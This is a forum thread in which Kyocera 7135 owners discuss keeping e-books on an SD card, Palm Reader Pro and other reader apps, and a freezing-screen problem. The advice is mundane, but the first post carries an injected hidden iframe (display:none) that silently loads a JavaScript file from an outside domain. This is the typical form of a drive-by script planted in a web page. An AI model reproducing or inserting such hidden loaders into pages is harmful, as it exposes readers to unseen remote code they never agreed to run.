+ Reply to Thread

E-books on SD card

I was running out of room in the internal memory on my 7135 (under one mb) and so I decided to move my collection of e-books to the SD card. I have several e-books on my device, some of them are pretty large and therefore it seemed logical to move them to the SD card. As soon as I moved them, my Palm e-book reader no longer could find them. The only solution to this problem I was able to find was to move the Palm E-book reader to the SD card as well. Once I did that, the reader was able to find the books just fine.

Just posting my experiences in order that it may be helpful to other 7135 users...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Dave

What E-Book reader are you using? Perhaps it is just a limitation of that version?

Originally posted by HoTSynC
    What E-Book reader are you using? Perhaps it is just a limitation of that version?
    Palm Reader Pro from Palm Digital Media
    Dave

Dave, from your experience with e-books are they generally in .pdb format? I was thinking of just using QuickWord as my reader (so I can just store the .pdb's on the SD). Are there lots of benefits to having a "real" e-book reader?
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Robert K.
    Dave, from your experience with e-books are they generally in .pdb format? I was thinking of just using QuickWord as my reader (so I can just store the .pdb's on the SD). Are there lots of benefits to having a "real" e-book reader?
    Most are in .pdb format. Occasionally they are in .pdf (Adobe Acrobat) format.

I have found an ebook reader to be beneficial for the following reasons:
    • one-finger page turning
    • bookmarks
    • font-smoothing
    Dave

Originally posted by dwdod
    Most are in .pdb format. Occasionally they are in .pdf (Adobe Acrobat) format.

I have found an ebook reader to be beneficial for the following reasons:
    • one-finger page turning
    • bookmarks
    • font-smoothing
    Dave - what ebook reader are you using?

Originally posted by Rambler
    Dave - what ebook reader are you using?
    OK. I haven't bugged anyone about using the search feature in several weeks. But Dave answered this question IN THIS THREAD just three posts up from your question!

Alan

Just blew right by it, sorry about that. May I give up my first born male child in concession to you?

Just blew right by it, sorry about that. May I give up my first born male child in concession to you?

consider yourself forgiven....

Alan

Looks like another victim of contracted posts syndrome. I have mine set to contract all previously read posts, which means I miss a lot when there is a lot of activity and I don't have time to read all the new posts each time I visit. The next time you go back, only new posts are shown uncontracted. Maybe that's what happened to Rambler....

Hello

Hello Guys,

I was one of the 7135 fanatics who bought it back in December. Since then, I have loved the phone and it still turns people's heads.

I've been having a problem with the screen turning white and freezing. Anyone have this problem? I thought it was secondary to the tons of programs I had on my main memory and my SD card. I did a hard reset, and even with no programs, it still freezes. I try to do a soft reset, and the white and frozen screen usually still remains. I just have to wait minutes to hours for the normal screen to reappear. This is getting very annoying, and I'm almost considering selling the phone. I contacted Kyocera, and they said to do a hard reset and remove all "3rd party Palm Programs", which didn't help out.

Any suggestions??? I'd appreciate it highly.

Constantine

RPC
    For dwdod:

I also have Palm Reader Pro. All the ebooks are on my SD card. The program is in regular Palm memory.

You may be happier keeping the program on the card since you are memory-tight, but it is not necessary. I am not sure why you are having a problem. With the Palm Reader Open screen, do you have categories set to "All"? I am running version 2.2.6. That version definitely works properly from regular memory.

Mobipocket

I love using the mobipocket reader, plus you can get tons of free ebooks at http://www.blackmask.com
    but when I use the program, the Led on the top of the phone stops showing my signal and battery levels, it still shows the time though.

try putting your ebooks in a "my documents" folder. I also use palm reader and it finds my books fine on the card in the my documents folder.

Palmreader is very versatile. It finds files in a "Books" directory as well. Of course it also finds them in the "Launcher" directory and RAM. I especially appreciate the college dictionary and thesaurus.

docs

Install MSMOUNT (Palmgear - free). iT SHOWS UP IN PALM PREFS. You then designate a directory on your SD Card - then any data files (docs etc.) that are put in that directory are readable by most apps as if they were in RAM.
    go here and be educated in using the SD card

http://www.geocities.com/romidar/index.htm

Originally posted by RPC
    For dwdod:

I also have Palm Reader Pro. All the ebooks are on my SD card. The program is in regular Palm memory.

You may be happier keeping the program on the card since you are memory-tight, but it is not necessary. I am not sure why you are having a problem. With the Palm Reader Open screen, do you have categories set to "All"? I am running version 2.2.6. That version definitely works properly from regular memory.
    Well, having the ebook reader along with all of my ebooks on the SD card is working just fine. Incidentally I am using version 2.2.2 of the reader, so I guess it's time to upgrade my software.
    Dave

Another very good reader for those reading standard DOC format PDBs is TiBR. It supports VFS, has a ton of nice features and is FREE!

http://www.freewarepalm.com/docs/tibr.shtml
    There are 10 kinds of people in the world, those who understand binary, and those who don't.